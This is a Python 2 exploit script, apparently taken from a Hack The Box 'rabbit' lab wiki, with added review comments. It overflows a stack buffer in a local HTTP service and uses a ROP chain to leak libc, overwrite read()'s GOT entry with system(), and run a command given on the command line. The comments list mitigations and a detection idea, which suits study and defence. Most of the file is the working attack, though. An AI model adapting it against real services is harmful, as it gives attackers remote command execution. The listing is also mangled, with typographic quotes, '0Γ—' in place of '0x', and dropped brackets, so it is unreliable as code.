
#!/usr/bin/python
import os, sys, socket
import struct
import requests

# NOTE(review): this listing comes from the htb-rabbit wiki and the wiki renderer
# has mangled it: straight quotes became typographic ones, "0x" became "0Γ—" and
# the list brackets in sys.argv[...] were dropped (sys.argv1). It is kept
# byte-for-byte as a record of the technique; it is not runnable as shown.
# Python 2 syntax throughout (print statement, str payloads).
#
# Technique, as far as the lines below show: a stack buffer overflow in the HTTP
# request path is used to run a ROP chain that (1) reads client input into the
# writable .dynamic section, (2) writes the GOT entry of read() back to the
# client so the script can derive libc addresses, (3) overwrites that GOT entry
# with the address of system(), and (4) calls through read@plt again, which by
# then presumably resolves to system().
#
# For the defender reading this writeup, the controls that break the chain:
# - bounds-checking the request path (568 bytes of filler reach the overwrite);
# - stack canaries, which would abort the process before the ROP chain runs;
# - full RELRO, which makes the GOT read-only after loading and defeats step (3);
# - PIE + ASLR: every PLT and gadget address below is a fixed 0x40xxxx value,
#   which only works against a binary mapped at a fixed address (non-PIE).
# Detection: the request line is "GET /" followed by hundreds of 'A' bytes and
# non-printable packed addresses; a request-line length or character-class rule
# on a reverse proxy or IDS would flag it.

addr = (β€˜127.0.0.1’, 9999)  # loopback lab target; the vulnerable service listens on 9999
cmd = sys.argv1+"\0"  # command passed on the CLI; NUL-terminated so it presumably reads as a C string once stored in .dynamic

# Offsets of read() and system() inside the target's libc build. They are tied
# to one specific libc; the leak at the bottom yields only read()'s runtime
# address, and system() is rebased from it by the offset difference.
libcread_offset = 0xe8050
libcsystem_offset = 0Γ—42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Request line; the path component is where the overflow begins.
payload = r’GET /\AAAA’

# Filler: pad the path to 568 bytes, less the 5 bytes of \AAAA already present,
# so that the packed addresses appended next land on the saved return address
# (presumably; the exact frame layout is not visible here).
payload += β€˜A’ * (568 -5)

# --- ROP stage 1: read(0, .dynamic) via read@plt (0000000000400cf0 <read@plt>:)
# Pulls the command string sent later (s.send(cmd)) into .dynamic. Reading from
# fd 0 assumes the service's stdin is the client connection (inetd-style) --
# not verifiable from this listing.
someother = struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 0) #stdin #fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr
someother += β€œ0xFF” # junk for r15

# --- ROP stage 2: write(1, &GOT[read]) -- sends the resolved libc read()
# pointer back to the client; the script unpacks it below as readaddr.
someother += struct.pack(β€œ<Q”, 0Γ—400c50) #write() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 1) #stdout # fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += β€œ0xFF” #junk for r15

# --- ROP stage 3: read(0, &GOT[read]) -- receives the system() address the
# script sends at the bottom and stores it in read()'s GOT slot. This is the
# step full RELRO prevents.
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += struct.pack(β€œ<Q”, 0Γ—0004011dd) #pop rdi; ret
someother += struct.pack(β€œ<Q”, 0) #stdin # fd arg

someother += struct.pack(β€œ<Q”, 0Γ—0004011db) #pop rsi; pop r15; ret
someother += struct.pack(β€œ<Q”, 0Γ—000603088) #read() in GOT
someother += β€œ0xFF” # junk for r15

# --- ROP stage 4: call read@plt once more; with the GOT slot now pointing at
# system(), this presumably becomes system(<string at .dynamic>).
someother += struct.pack(β€œ<Q”, 0Γ—000400cf0) #read() call loc
someother += β€˜FFFFFFFF’ # bogus
someother += struct.pack(β€œ<Q”, 0Γ—000602e28) #.dynamic addr system()

payload = payload + someother

s.connect(addr)

# Full request: the overflowed request line, a few headers, then blank lines.
# Everything after the filler travels as raw packed bytes inside the URL.
s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /β€˜+’\n’+’\n’+’\n’)

# Command string consumed by ROP stage 1.
s.send(cmd)

# Stage 2's write() arrives here: unpack the leaked read() pointer and rebase
# system() from it using the libc offsets defined above.
readaddr = struct.unpack(β€œ<Q”, s.recv(1024))0 #keep this line
print β€œlibc read() found at 0x%.8x” % readaddr #keep this line
systemaddr = readaddr – libcread_offset + libcsystem_offset
print β€œlibc system() found at 0x%.8x” % systemaddr
# Consumed by stage 3's read() into the GOT.
s.send(struct.pack(β€œ<Q”, systemaddr))

# Whatever the service writes back after stage 4, if anything.
print s.recv(1024)

# NOTE: `s.close` without parentheses only references the bound method; the
# socket is never closed explicitly and is left to interpreter teardown.
s.close
